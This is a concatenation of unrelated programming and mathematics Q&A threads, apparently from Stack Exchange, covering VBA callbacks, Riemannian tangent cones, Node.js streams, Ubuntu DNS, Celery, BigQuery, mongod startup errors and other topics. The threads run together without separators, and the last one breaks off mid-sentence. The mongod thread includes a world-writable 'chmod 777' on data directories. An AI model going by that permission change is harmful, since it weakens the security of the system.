Custom callbacks in VBA Note the tag: VBA, not VB6, not VB.NET. This is specific to VBA in MS Access. I've built a collection of methods in a module I call "Enumerable". It does a lot of things reminiscent of the Enumerable classes and interfaces in .NET. One thing I want to implement is a ForEach method, analogous to the .NET Enumerable.Select method. I built a version that uses the Application.Run method to call a function for each element, but Application.Run only works with user-defined methods. For example, the following works: ' User-defined wrapper function: Public Function MyReplace( _ Expression As String, Find As String, StrReplace As String, _ Optional Start As Long = 1, _ Optional Count As Long = 1, _ Optional Compare As VbCompareMethod = vbBinaryCompare) MyReplace = Replace(Expression, Find, StrReplace, Start, Count, Compare) End Function ' Using Application.Run to call a method by name Public Sub RunTest() Debug.Print Run("MyReplace", "Input", "In", "Out") End Sub RunTest prints "Output", as expected. The following does NOT work: Debug.Print Run("Replace", "Input", "In", "Out") It throws run-time error 430: "Class does not support Automation or does not support expected interface". This is expected, because the documentation states that Application.Run only works for user-defined methods. VBA does have an AddressOf operator, but that only works when passing function pointers to external API functions; function pointers created using AddressOf are not consumable in VBA. Again, this is noted in the documentation (or see for example VBA - CallBacks = Few Cents Less Than A Dollar?). So is there any other way to identify and call a method using a variable? Or will my callback-ish attempts be limited to user-defined functions via the Application.Run method? You won't be able to use AddressOf, but VBA supports classes so interface-based callbacks are fine; sub something(arg as string, myCallBack as IWhatever) ... myCallBack.call(...) 
Stuff your methods into a class and you can invoke them by name with "CallByName" - it's a bit weak due to the handling of dynamic numbers of arguments; an alternative: http://www.devx.com/tips/Tip/15422 I'm a little confused on what you actually need help with. Your first paragraph talks about implementing For...Each but the rest of your question talks about trying to use Application.Run on a VBA function. @mischab1 - Take a look at any of the .NET IEnumerable extension methods. In most of them you provide a callback to execute on each member of a collection. I'm trying to do the same thing in VBA. VBA does not have delegates or function pointers or anything. I've used Application.Run as a substitute, but it has limited applicability. No other answers in a week... for resolution's sake, here's the best I could come up with: I built a helper module that resolves a ParamArray to individual arguments for the sake of calling CallByName. If you pass a ParamArray through to CallByName it will mash all the arguments into a single, actual Array and pass that to the first argument in the method you attempt to invoke. I built two ForEach methods: one that invokes Application.Run, and another that invokes CallByName. As noted in the question, Application.Run only works for user-defined global (public module) methods. In turn, CallByName only works on instance methods, and requires an object argument. That still leaves me without a way to directly invoke built-in global methods (such as Trim()) by name. My workaround for that is to build user-defined wrapper methods that just call the built-in global method, for example: Public Function FLeft( _ str As String, _ Length As Long) As String FLeft = Left(str, Length) End Function Public Function FLTrim( _ str As String) As String FLTrim = LTrim(str) End Function Public Function FRight( _ str As String, _ Length As Long) As String FRight = Right(str, Length) End Function ...etc...
I can now use these to do things like: ' Trim all the strings in an array of strings trimmedArray = ForEachRun(rawArray, "FTrim") ' Use RegExp to replace stuff in all the elements of an array ' --> Remove periods that aren't between numbers Dim rx As New RegExp rx.Pattern = "(^|\D)\.(\D|$)" rx.Global = True resultArray = ForEachCallByName(inputArray, rx, "Replace", VbMethod, "$1 $2") You mean FLTrim here, trimmedArray = ForEachRun(rawArray, "FTrim")? @bonCodigo No, Trim and LTrim are separate VBA functions. In the top code I show an example of the wrapper for LTrim, and in the lower example I use the wrapper for Trim. I have a couple of alternative suggestions; would you still be interested in answers to the question? @Blackhawk, I just found this question via a search engine, so I guess it's safe to assume the answer is yes, someone will be interested @user357269 For an implementation of first-class functions in VBA (as in, functions which can be stored in variables, passed to functions, and called anonymously), see this. Very old question, but for those looking for a more general approach, please use stdCallback and stdLambda alongside stdICallable. These can be found as part of the stdVBA library (a library largely maintained by myself). sub Main() 'Create an array Dim arr as stdArray set arr = stdArray.Create(1,2,3,4,5,6,7,8,9,10) 'Can also call CreateFromArray 'Demonstrating join; join will be used in most of the below functions Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10 Debug.Print arr.join("|") '1|2|3|4|5|6|7|8|9|10 'Basic operations arr.push 3 Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10,3 Debug.Print arr.pop() '3 Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10 Debug.Print arr.concat(stdArray.Create(11,12,13)).join '1,2,3,4,5,6,7,8,9,10,11,12,13 Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10 'concat doesn't mutate object Debug.Print arr.includes(3) 'True Debug.Print arr.includes(34) 'False 'More advanced behaviour when including callbacks! And VBA Lambdas!!
Debug.Print arr.Map(stdLambda.Create("$1+1")).join '2,3,4,5,6,7,8,9,10,11 Debug.Print arr.Reduce(stdLambda.Create("$1+$2")) '55 ' I.E. Calculate the sum Debug.Print arr.Reduce(stdLambda.Create("Max($1,$2)")) '10 ' I.E. Calculate the maximum Debug.Print arr.Filter(stdLambda.Create("$1>=5")).join '5,6,7,8,9,10 'Execute property accessors with Lambda syntax Debug.Print arr.Map(stdLambda.Create("ThisWorkbook.Sheets($1)")) _ .Map(stdLambda.Create("$1.Name")).join(",") 'Sheet1,Sheet2,Sheet3,...,Sheet10 'Execute methods with lambdas and enumerate over enumeratable collections: Call stdEnumerator.Create(Application.Workbooks).forEach(stdLambda.Create("$1#Save")) 'We even have if statements! With stdLambda.Create("if $1 then ""lisa"" else ""bart""") Debug.Print .Run(true) 'lisa Debug.Print .Run(false) 'bart End With 'Execute custom functions Debug.Print arr.Map(stdCallback.CreateFromModule("ModuleMain","CalcArea")).join '3.14159,12.56636,28.274309999999996,50.26544,78.53975,113.09723999999999,153.93791,201.06176,254.46879,314.159 'Creating from an object property Debug.Print arr.Map(stdCallback.CreateFromObjectProperty(arr,"item", vbGet)) '1,2,3,4,5,6,7,8,9,10 'Creating from an object method Debug.Print arr.Map(stdCallback.CreateFromObjectMethod(someObj,"getStuff")) End Sub Public Function CalcArea(ByVal radius as Double) as Double CalcArea = 3.14159*radius*radius End Function
Euclidean tangent cone implies Riemannian manifold It is known that given a Riemannian manifold, the tangent cone (as a metric space) at any point $p$ is isometric to the tangent space at $p$, with the metric given by the metric tensor. Is there a converse, or an additional condition to have a converse, in the following form? Given a metric space $X$ such that the tangent cone at any point is a Euclidean space of dimension $n$, and (possibly additional conditions), then $X$ is a Riemannian manifold of dimension $n$. E.g., you may assume that $X$ has bounded curvature (since "at the end" it will). Then $X$ is a manifold by known theorems (see "Alexandrov spaces"). @valeri So is there an actual statement "A metric space with curvature bounded below is a Riemannian manifold iff its tangent cone is a Euclidean vector space"? Note that if $X$ has bounded (below and above here) curvature and no boundary, then you may have tangent cone = Euclidean space for free. Then, if I remember correctly, yes, it was proved that an Alexandrov space with bounded curvature is a ($C^{1,\alpha}$?) manifold. Cannot help with references though :( So, bounded curvature is a very strong condition; you might like something else. According to Burago-Burago-Ivanov (see Theorem 10.10.13), the result @valeri mentioned is due to Nikolaev (the proof is not given, but a reference is given to V. Berestovskii and I. Nikolaev, Multidimensional generalized Riemannian spaces, in Geometry IV. Non-regular Riemannian geometry. Encyclopaedia of Mathematical Sciences, Springer-Verlag, Berlin, 1993, 165-244.) I also wonder if the issue is regularity. In Otsu and Shioya they have that an Alexandrov space such that the tangent cone is everywhere Euclidean is $C^0$-Riemannian (see Remark 3 on page 631). Note that the result of Nikolaev in my previous comment gives that the manifold has a $C^3$ atlas and the metric is $W^{2,p}$, so it has better regularity. Let $X$ be any Riemannian manifold, and $x$ a point.
Choose a sequence $(x_n)$ with $d(x_n,x)=2^{-n}$. Let $V_n$ be a subset contained in the ball of radius $2^{-2^{n}}$ around $x_n$. Then it is immediate that the tangent cone of $Y=X\smallsetminus \bigcup V_n$ at $x$ is the same as that of $(X,x)$. But (if every $V_n$ is nonempty), $Y$ is not a topological manifold at $x$. If moreover the $V_n$ are chosen closed (e.g., the whole closed ball), $Y$ is Riemannian at every other point, so every tangent space is isometric to a Euclidean space ("is a Euclidean space" is an ambiguous formulation). To provide some context: the subsets of a Euclidean space that can be approximated by affine planes on every scale are known as Reifenberg-flat sets, after E. R. Reifenberg, who proved in the 1960s that such sets are bi-Hölder to a Euclidean space. There is a substantial literature on the subject (search on "Reifenberg-flat"). Now regarding your specific question: T. Colding and A. Naber construct in Lower Ricci Curvature, Branching, and Bi-Lipschitz Structure of Uniform Reifenberg Spaces a metric space $Y$ such that (1) the tangent cones of $Y$ are all isometric to $\mathbb R^n$ (which by an earlier work of J. Cheeger and Colding implies that $Y$ is bi-Hölder homeomorphic to $\mathbb R^n$); (2) every bounded set of $Y$ is bi-Lipschitz embeddable in some Euclidean space; (3) there is no homeomorphism of $Y$ onto $\mathbb R^n$ such that the pullback geometry is induced by some $C^{0,\beta}$ Riemannian metric where $0<\beta<1$. To show (3) they prove that geodesics in $Y$ branch in the sense of Theorem 1.3 of the linked paper. Moreover, $Y$ occurs "in nature" as a pointed Gromov-Hausdorff limit of a noncollapsing sequence of Riemannian $n$-manifolds with a common lower bound on Ricci curvature. I am not sure whether the metric on $Y$ can be induced by a $C^0$ Riemannian metric, but in any case branching of geodesics is not a property a decent $C^0$ metric should be proud of.
Analyze nodejs memory with and without stream API node v14.17.0. I'm trying to test memory consumption with and without the use of streams. The main goal is to find a metric that will clearly show the benefits of using a stream. Currently the results look the same: TEST #1: read file without stream test('read file without stream and upload to s3', async () => { const fileContent = fs.readFileSync(path.join(__dirname, './benda.js'), 'utf8'); await _uploadFile(`${FILE_NAME}`, bucket, fileContent); const used = process.memoryUsage(); for (let key in used) { console.log(`${key} ${Math.round(used[key] / 1024 / 1024 * 100) / 100} MB`); } }) result #1: rss 1541.91 MB heapTotal 538.3 MB heapUsed 535.07 MB external 482.39 MB arrayBuffers 0.1 MB TEST #2: create read stream and upload to s3 test('create read stream and upload to s3', async () => { const readStream = fs.createReadStream(path.join(__dirname, './benda.js')); await _uploadFile(`${FILE_NAME}`, bucket, readStream); const used = process.memoryUsage(); for (let key in used) { console.log(`${key} ${Math.round(used[key] / 1024 / 1024 * 100) / 100} MB`); } }); const _uploadFile = async(fileName, bucket, streamOrContent) => { const command = new PutObjectCommand({ Bucket: bucket, Key: fileName, Body: streamOrContent }); const res:PutObjectCommandOutput = await s3Client.send(command); return res; }; result #2: rss 1543.93 MB heapTotal 539.8 MB heapUsed 536.39 MB external 485.05 MB arrayBuffers 3.39 MB It seems pretty much the same; the file size is ~504MB. Please let me know what I'm missing here, or whether my test is wrong. Why would you think that reading a file from a local disk is the same operation as uploading a file to s3 and therefore should use the same amount of temporary memory? These are vastly different code paths, implemented completely differently. It's no wonder they might use a different amount of memory to accomplish their job. Thanks for the comment, I updated the question by uploading the file to s3 on test #1 too.
still getting the same result. Do you have a better use-case to test memory usage? What problem are you trying to solve here? You have measured that two different code paths (one using a stream, the other reading the whole file into memory) happen to use a slightly different amount of memory in one specific test. This is not surprising in the least. Is there an actual problem here? All this memory usage should only be temporary too, so as soon as you aren't using those variables any more and the operation is done, the garbage collector will reclaim that memory as available for reuse by future JavaScript allocations. I'm going to load large amounts of data from different types of databases. My goal is to reduce the load on the servers, and I thought that one of the ways is to use streaming instead of loading huge files into memory. Streaming loads data in chunks rather than loading the whole thing into memory, so if all else is equal, streaming may have lower peak memory usage. But a 2MB file size is practically noise in these measurements (only 2% of the heap) and may be countered by additional usage by the streaming mechanism. Try it with a 2GB file and the difference will be much more obvious. I updated my test to use a file size of ~504MB. Still the same result. Maybe there is another metric that will clearly show the benefits of using a stream?
How to pass File in electron contextBridge I could not find docs on electron contextBridge and what is done to the API arguments, but obviously something is done. This is the gist of it: // preload.js contextBridge.exposeInMainWorld('fileCache', { put (file) { console.log(file) // ==> {} } }) // web app window.fileCache.put(new File([], 'foo.txt')) How should I pass a File or any Blob or Buffer argument? (making a string is not an option for performance reasons: 20+ MB files...) Closest ref I have found: https://github.com/electron/electron/blob/master/spec-main/api-context-bridge-spec.ts URL.createObjectURL(file) ==> fetch(url) works
How to configure DNS servers manually on Ubuntu server via bash? I still want to use DHCP to obtain IPv4 and IPv6 addresses. DHCP delivers DNS servers; I want the DNS servers from DHCP to be ignored and two servers I specify manually to be used instead. This must be done on a headless server (no GUI) via Bash. ubuntu-14.04.2-server-amd64, standard minimal installation + sshd. How is this configured correctly? How do I verify that the configuration works as expected? /etc/network/interfaces is: # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback # The primary network interface auto em1 iface em1 inet dhcp resolvconf is installed. Can you use vi to edit /etc/network/interfaces and add your own DNS server entries? Yes, I could do that. What should I put there? How does it interact with resolv.conf? Add dns-nameservers <your DNS server IPs> to the end of your interfaces file and reboot the server... this should add the required DNS servers to the network config... There is some documentation at https://help.ubuntu.com/lts/serverguide/network-configuration.html, but it doesn't help me (not enough details about how to write the "stanza"s and what effect they have). Can you expand on the last comment? You shouldn't need to put < and > - this was my way of saying "this is where you type your DNS server IPs". For example: dns-nameservers <IP_ADDRESS> <IP_ADDRESS> to add Google's primary and secondary DNS addresses. @Big Chris: sorry, didn't see your comment when I wrote mine. @Big Chris: Your proposal seems not to work. I made the change. The content of resolv.conf did not change. I did ifdown em1: resolv.conf has no more DNS servers. I did ifup em1: resolv.conf again gets DNS from DHCP, not those configured in interfaces. Accidentally clicked to start a chat conversation... sorry!
This answer may help with additional options to try: http://askubuntu.com/questions/130452/how-do-i-add-a-dns-server-via-resolv-conf I tried to use /etc/dhcp/dhclient.conf: prepend domain-name-servers, but it doesn't work. "Adding" name server entries is not what I want. The interfaces approach possibly only works with "static" and not with "dhcp". Try using supersede domain-name-servers rather than prepend - as seen at http://unix.stackexchange.com/questions/146463/specifying-dns-settings-to-override-those-of-dhcp Both supersede and prepend do not work. /etc/resolv.conf still has the two servers from DHCP after a reboot. Have a read of this (https://raam.org/2009/configuring-static-dns-with-dhcp-on-debianubuntu/)... we might be getting the wrong file... Thanks, I had a syntax error in resolv.conf; now supersede works! I still cannot guess the correct syntax for supersede to add two nameservers. Separating them with a blank provokes a syntax error. Separate the two IPs with a comma :) e.g. supersede domain-name-servers <IP_ADDRESS>, <IP_ADDRESS>; Add the line supersede domain-name-servers <IP_ADDRESS>, <IP_ADDRESS>; to the DHCP client configuration file /etc/dhcp/dhclient.conf. To verify, get the names of your network interfaces with ifconfig, shut down the interface(s) with ifdown ifname (e.g. ifdown eth0), and restart with ifup ifname (e.g. ifup eth0). After that (or after a reboot) /etc/resolv.conf should contain the two lines nameserver <IP_ADDRESS> nameserver <IP_ADDRESS> Thanks to Big Chris.
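The exact punctuation is what tripped things up above: IPs separated by a comma, line terminated by a semicolon. A small shell sketch (writing to a scratch file rather than the real /etc/dhcp/dhclient.conf, with Google's public resolvers purely as placeholder IPs) to generate and sanity-check the line before touching the live config:

```shell
# Build the supersede line in a scratch file and show it.
dns1=8.8.8.8      # placeholder; substitute your own DNS servers
dns2=8.8.4.4
conf=$(mktemp)

printf 'supersede domain-name-servers %s, %s;\n' "$dns1" "$dns2" >> "$conf"
cat "$conf"
```

After appending the same line to /etc/dhcp/dhclient.conf, cycle the interface (ifdown em1; ifup em1) and check /etc/resolv.conf as described in the answer.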
celery issuing tasks from subtasks My "big" task works in steps: it can either terminate or spawn more tasks. In my example, I count to 5. from celery import Celery app = Celery('tasks', broker='redis://localhost:6379/0') from time import sleep @app.task def slow_add(x): """Slowly counts to 5""" sleep(1) print(x) if x == 5: return x else: return slow_add.s(x+1)() When I schedule the task, I get only one invocation: In [48]: tasks.slow_add.run(1) 1 2 3 4 5 Out[48]: 5 How do I call it asynchronously? I tried different variations of apply_async and delay, but to no avail. I see no tasks in the celery monitor. Why? How can I get intermediate state (in this case, the number between 1 and 5) while the task is asynchronously executing? In my example, @app.task def test(x): import time time.sleep(1) print(x) if x == 5: return x else: return test.delay(x+1) It works fine asynchronously when I use res = test.delay(1) In the Celery monitor I can see the tasks received Received task: services.tasker.test[67f22e02-7c39-4c1d-a646-acabeb72d208]1 Received task: services.tasker.test[9eed6d45-4931-4790-8477-3bbe75e213e4] Task services.tasker.test[67f22e02-7c39-4c1d-a646-acabeb72d208] succeeded in 3.021544273s: None2... You can get task state using res.ready(); it returns True when the task is finished, otherwise it returns False. In my test case, the results are like >>> res = test.delay(1) >>> res.ready() # before finishing task False >>> res.ready() # after finishing task True or def final_result(r): if isinstance(r.result, celery.result.AsyncResult): return final_result(r.result) else: return r.result and use the above like >>> print(final_result(res)) 5 In this case I cannot get the result of the original command. I.e. it is complete after 1 second, but how do I get the 5? No, I badly phrased the question. The task completes after 1 iteration; celery just spawns a new one without linking to the parent one. How do I get the async handle of the last task?
In other words, your example really does what I asked: creates 5 tasks. But in the end I am only interested in the result of the last one (which I can get if I have the handle).
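For completeness, the recursive unwrapping suggested above can be exercised without a broker: the sketch below mimics the shape of celery.result.AsyncResult with a tiny stand-in class so it runs anywhere. With real Celery you would test isinstance(r.result, celery.result.AsyncResult) instead of the stand-in:

```python
class FakeAsyncResult:
    """Stand-in for celery.result.AsyncResult: .result holds either the
    final value or another result object when the task spawned a follow-up."""
    def __init__(self, result):
        self.result = result

def final_result(r):
    # Walk the chain of results until .result is a plain value, then return it.
    while isinstance(r.result, FakeAsyncResult):
        r = r.result
    return r.result

# Simulate slow_add(1): each task spawns the next until x == 5,
# leaving a chain of result handles ending in the value 5.
chain = FakeAsyncResult(FakeAsyncResult(FakeAsyncResult(FakeAsyncResult(5))))
```

This is exactly the "follow the handle" idea: you only ever hold the first task's handle, and you chase .result links until they bottom out in the last task's value.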
How to import the Cryptography library in ASP.NET Core I have the following problem: it turns out that in my code I have the following: private void CreatePasswordCreate(string password, out byte[] passwordCreate, out byte[] passwordRepeat) { using (var hmac = new System.Security.Cryptography.HMACSHA512()) { passwordCreate = hmac.Key; passwordRepeat = hmac.ComputeHash(System.Text.Encoding.UTF8.GetBytes(password)); } } but when writing it I get the following error: CS0234: The type or namespace name 'Security' does not exist in the namespace 'System.Invoices.System' (are you missing an assembly reference?) The error above appears on the following line of code, specifically on the word 'Security': using (var hmac = new System.Security.Cryptography.HMACSHA512()) and I also get the following error: CS0234: The type or namespace name 'Text' does not exist in the namespace 'System.Invoices.System' (are you missing an assembly reference?) I get this error on the following line of code: passwordRepeat = hmac.ComputeHash(System.Text.Encoding.UTF8.GetBytes(password)); I do not know how to import this library since I am a newbie at this. I would like to know how to add this library, or what the classes 'Security' and 'Text' should contain and where they should be created, since they do not appear automatically under using System. Are you familiar with nuget? Being a newbie is no shame, but I wouldn't start with security-related development. Yes, but if I do not start now, when?
If not, I will never learn. I come here for solutions, not to be sent back to the beginning; helping would not teach me a bad practice. I already solved the error I had. Instead of the code I had, the solution is this: private void CreatePasswordCreate(string password, out byte[] passwordCreate, out byte[] passwordRepeat) { using (var hmac = new Security.Cryptography.HMACSHA512()) { passwordRepeat = hmac.Key; passwordCreate = hmac.ComputeHash(Encoding.UTF8.GetBytes(password)); } } and then make the call to the function that was created, before the assignment of the variables, in the following way: CreatePasswordCreate(model.password, out byte[] passwordCreate, out byte[] passwordRepeat); and import using System.Text; However, it also works in the following way, adding System in front of Security.Cryptography: private void CreatePasswordCreate(string password, out byte[] passwordCreate, out byte[] passwordRepeat) { using (var hmac = new System.Security.Cryptography.HMACSHA512()) { passwordRepeat = hmac.Key; passwordCreate = hmac.ComputeHash(Encoding.UTF8.GetBytes(password)); } }
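For anyone following along in another stack: the pattern in the C# snippet - keep the randomly generated HMAC key as a per-user salt and store the HMAC of the password as the hash - looks like this in Python's standard library. This is an illustration of the same idea under that assumption, not the poster's code:

```python
import hashlib
import hmac
import os

def create_password_hash(password: str):
    # 64 random bytes play the role of HMACSHA512's auto-generated hmac.Key.
    key = os.urandom(64)
    digest = hmac.new(key, password.encode("utf-8"), hashlib.sha512).digest()
    return key, digest

def verify_password(password: str, key: bytes, digest: bytes) -> bool:
    # Recompute with the stored key and compare in constant time.
    candidate = hmac.new(key, password.encode("utf-8"), hashlib.sha512).digest()
    return hmac.compare_digest(candidate, digest)
```

Both the key (salt) and the digest must be stored; verification recomputes the HMAC with the stored key rather than ever decrypting anything.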
Using Python to access a Java API? I have written Python scripts which get data from various sources (Quandl, web scraping etc.) at the moment. I want to switch to a more stable information feed and order placement system. The broker provides an API: https://www.sharekhan.com/active-trader/oalert/new-to-oalert After looking through the docs and the scant information available, it seems I can only use it with Java. I am new-ish to Python and have never tried Java. Can someone point me in the direction of where to begin learning more about how to use the API in my Python program/script? From the FAQ: TradeTiger API has a Transmission Control Protocol (TCP)-based architecture. So, it can work in any programming language that can communicate using the TCP protocol. Some programming languages that are compatible with the API are C#.net, VB.Net, Java, Python, C++ and VB. Thanks. Unless your Python code runs under something like Jython, you can't use Java APIs from Python. Either you'll need a proper Python library that implements the API (which your quote from the FAQ suggests they supply), or there is an HTTP-based API that can be accessed via any language that supports HTTP requests. @chepner While an HTTP-based API would be ideal, Python can also work at the lower level of any generic TCP-based API. The architecture may use TCP, but that doesn't mean it's a detail exposed at the API level. (Granted, it doesn't make a lot of sense to be listing languages that can support TCP communication.) @chepner A quick glance at the documentation at https://www.sharekhan.com/Upload/General/TradeTigerAPIForClient.pdf shows that the API seems to be pure TCP with no sugary HTTP on top of it. According to the quote you gave from the documentation, the API uses TCP. You can access this with any networking library in any language, including Python. To start, you will need to learn the basics of TCP. A Google search will lead you to the technical documentation.
An RFC gives the official specification. Then you will need a Python library to open a network connection and send binary data. Finally, you will need to read the documentation for the API. Thanks, can you point me to some resource where I can start reading/learning how to go about it? @Sid You should start by learning the basics of TCP. A Google search should point you to the technical documentation. Then read the API documentation at https://www.sharekhan.com/Upload/General/TradeTigerAPIForClient.pdf and find a TCP library for Python to implement the requests.
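To make that first step concrete, here is a minimal sketch of opening a TCP connection and exchanging bytes with Python's standard socket module - the building block for talking to any TCP-based API. The host, port, and "protocol" below are stand-ins (a throwaway local echo server), not the broker's actual wire format, which you would take from the PDF linked above:

```python
import socket
import threading

def echo_server(sock):
    # Accept one connection and echo whatever arrives back to the client.
    conn, _ = sock.accept()
    with conn:
        data = conn.recv(1024)
        conn.sendall(data)

def tcp_request(host, port, payload: bytes) -> bytes:
    # Open a TCP connection, send the payload, return the server's reply.
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        return s.recv(1024)

# Spin up a throwaway local server so the sketch is self-contained.
server = socket.socket()
server.bind(("127.0.0.1", 0))        # port 0 = let the OS pick a free port
server.listen(1)
port = server.getsockname()[1]
threading.Thread(target=echo_server, args=(server,), daemon=True).start()

reply = tcp_request("127.0.0.1", port, b"LOGIN|demo")
```

Against a real API you would replace the echo server with the broker's host/port and format the payload according to their message specification.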
Appending to Destination Table with Some Nullable Fields Missing Fails in BigQuery I'm running a query whose result needs to be appended (WRITE_APPEND) to a destination table. In the destination table there are several fields that are NULLABLE. In my query result, some of the NULLABLE fields from the destination table are missing. My query fails with the following error: Query Failed Error: Invalid schema update. Field age is missing in new schema Job ID: job_5761xOBwaQbQPIi6wD9dqy-Cdzk Seems like an unnecessary limitation, especially given that I can do the same thing via JSON uploads. Is there any workaround for this? Thanks, Navneet We've got a fix for this issue; it got re-prioritized behind some other work, but we'll likely get it in soon, hopefully by early next week. awesome.. that will be great! Hi Jordan, I'm trying the fix that Fh. suggested: Select null as a_field, etc. (see job: job_57jKlRYSmsQ2j9AwKX36akiRImE). However it gives me the following error: Query Failed Error: Invalid schema update. Field age has changed type. Can you please suggest the right way to save to the destination table when the query result is missing some fields that are nullable in the destination table. Thanks a lot. - navneet That's an interesting feature request. In the meantime, could you manually add the missing columns as nulls to the query, so it doesn't fail? Something like this: SELECT word, null AS a_field FROM [publicdata:samples.shakespeare] LIMIT 10 (note that column a_field has only nulls) Yes. I know this will work. Would appreciate the feature in the future. Jordan saves the day :) Not so quick.. Now I get a different error: Query Failed Error: Invalid schema update. Field age has changed type Job ID: job_57jKlRYSmsQ2j9AwKX36akiRImE haven't been able to reproduce - more context? (or reply to Jordan's answer to get him notified) sure.. are you able to see the job?
job_57jKlRYSmsQ2j9AwKX36akiRImE Here's the query: SELECT user as name, null as age FROM [ziptrips.tempTable2]; The destination table has two columns: name:string, age:integer. I get the following error: Query Failed Error: Invalid schema update. Field age has changed type Job ID: job_OepNVE3587egdJOSp2DYAJB8n0I Please add more context. I can help answer much faster this way. Job IDs are better for bugs that get reported to the team, but for general query support, prefer pasting the actual query and preferably sample data - that way a lot more people can answer these questions. The null default data type is not the same as the data type of the field in your schema. You need to define its data type. Try SELECT user as name, integer(null) as age FROM [ziptrips.tempTable2];
Mongod server not working due to the following error sanket@sanket:~$ sudo mongod sudo: unable to resolve host sanket [sudo] password for sanket: mongod --help for help and startup options Sun Oct 5 09:58:48.970 [initandlisten] MongoDB starting : pid=2548 port=27017 dbpath=/data/db/ 64-bit host=sanket Sun Oct 5 09:58:48.970 [initandlisten] db version v2.4.9 Sun Oct 5 09:58:48.970 [initandlisten] git version: nogitversion Sun Oct 5 09:58:48.970 [initandlisten] build info: Linux orlo 3.2.0-58-generic #88-Ubuntu SMP Tue Dec 3 17:37:58 UTC 2013 x86_64 BOOST_LIB_VERSION=1_54 Sun Oct 5 09:58:48.970 [initandlisten] allocator: tcmalloc Sun Oct 5 09:58:48.970 [initandlisten] options: {} Sun Oct 5 09:58:49.101 [initandlisten] journal dir=/data/db/journal Sun Oct 5 09:58:49.102 [initandlisten] recover : no journal files present, no recovery needed Sun Oct 5 09:58:49.237 [initandlisten] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:27017 Sun Oct 5 09:58:49.237 [websvr] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:28017 Sun Oct 5 09:58:49.237 [initandlisten] ERROR: addr already in use Sun Oct 5 09:58:49.237 [websvr] ERROR: addr already in use Sun Oct 5 09:58:49.237 [initandlisten] now exiting Sun Oct 5 09:58:49.237 dbexit: Sun Oct 5 09:58:49.237 [initandlisten] shutdown: going to close listening sockets... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: going to flush diaglog... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: going to close sockets... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: waiting for fs preallocator... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: lock for final commit... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: final commit... Sun Oct 5 09:58:49.328 [initandlisten] shutdown: closing all files... Sun Oct 5 09:58:49.328 [initandlisten] closeAllFiles() finished Sun Oct 5 09:58:49.328 [initandlisten] journalCleanup...
Sun Oct 5 09:58:49.328 [initandlisten] removeJournalFiles Sun Oct 5 09:58:49.390 [initandlisten] shutdown: removing fs lock... Sun Oct 5 09:58:49.390 dbexit: really exiting now sanket@sanket:~$ Hmm... so, /data/db is owned by user mongodb - seems right. But inside it, /data/db/journal is owned by root. Feels wrong to me. How do I change it? It's not letting me change the permissions from the terminal. Yeah... the sudo: unable to resolve host sanket-PC error message is pretty spooky. That seems to be a separate problem. (but both could have the same cause) I added a little to the answer. Something about the sudo: unable to resolve host issue - Related: http://askubuntu.com/questions/59458/error-message-when-i-run-sudo-unable-to-resolve-host-none Looks like you need to fix that sudo thing first - read the link above, it has a good answer. You replaced the whole question - it's not easy to see what changed. Did you get the sudo issue fixed? The new text looks unclear to me. I could edit in the old text again, if you tell me what the step before posting the new version was. It's important to have the whole question together even if it's no longer useful for you, because we intend to collect helpful questions, and good answers. Try this: ps wuax | grep mongo You should see something that looks like this Savio 10592 0.5 0.4 2719784 35624 ?? S 7:34pm 0:09.98 mongod Savio 10911 0.0 0.0 2423368 184 s000 R+ 8:24pm 0:00.00 grep mongo or find the word mongod, and then sudo kill 10592; after that, start mongod again. This works for me for the "addr already in use" error. Works for me. One positive point added The server seems to be started as the wrong user, and cannot access its data files. How did you start it? Did you run it from the shell as your own user, or as a service? Take a look at the owner of the data directories - that's the user it needs to run as.
The command ls -ld /data /data/db /data/db/journal would show the user (using three directories because I do not know which will be readable.) Hmm... so, /data/db is owned by user mongodb - seems right. But inside it, /data/db/journal is owned by root. Feels wrong to me. Try a sudo chown -R mongodb:mongodb /data/db/journal; then /data/db/journal with all files in it is owned by the mongodb user. But there is an independent problem involved that you need to fix first: sudo does not work and shows the error sudo: unable to resolve host sanket-PC, which means you currently have no root access. See Error message when I run sudo: unable to resolve host (none). You made an edit replacing the whole question text without saying what changed, so it's hard to tell whether the question still makes sense. Looking at the log, there is an interesting error: the database tries to start, and finds that the network port it has to use to listen for client connections is already in use: Sun Oct 5 09:58:49.237 [initandlisten] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:27017 Sun Oct 5 09:58:49.237 [websvr] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:28017 Sun Oct 5 09:58:49.237 [initandlisten] ERROR: addr already in use Sun Oct 5 09:58:49.237 [websvr] ERROR: addr already in use The port is chosen such that there normally is nobody using it for anything else; that means it's most probably mongod that is using the port - meaning there is an instance already running. Try pgrep -fa mongod to show running mongod processes. (Independent of this, it's unclear whether the original issue is fixed. It could not cause the original error here because there were no journal files.) I ran it from the terminal.
sanket@sanket-PC:~$ ls -ld /data drwxr-xr-x 3 root root 4096 Sep 28 23:04 /data sanket@sanket-PC:~$ ls -ld /data/db drwxrwxrwx 3 mongodb mongodb 4096 Sep 30 22:34 /data/db sanket@sanket-PC:~$ ls -ld /data/db/journal drwxr-xr-x 2 root root 4096 Sep 30 22:45 /data/db/journal sanket@sanket-PC:~$ sudo chmod 777 /data/db/journal sudo: unable to resolve host sanket-PC [sudo] password for sanket: sanket@sanket-PC:~$ sudo chmod 777 /data sudo: unable to resolve host sanket-PC sanket@sanket-PC:~$ sudo chmod 777 /dat You can edit your question and append it; comments may get lost (and are hard to read, in this case). The owner is root for most of the directories. How do I change it? I am the administrator. sudo mongod is also not working.
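The manual ls -ld inspection above can be scripted; a minimal sketch, assuming GNU coreutils stat (the -c %U format is Linux-specific, and check_owner is just an illustrative helper name):

```shell
# Helper mirroring the manual `ls -ld` ownership check above.
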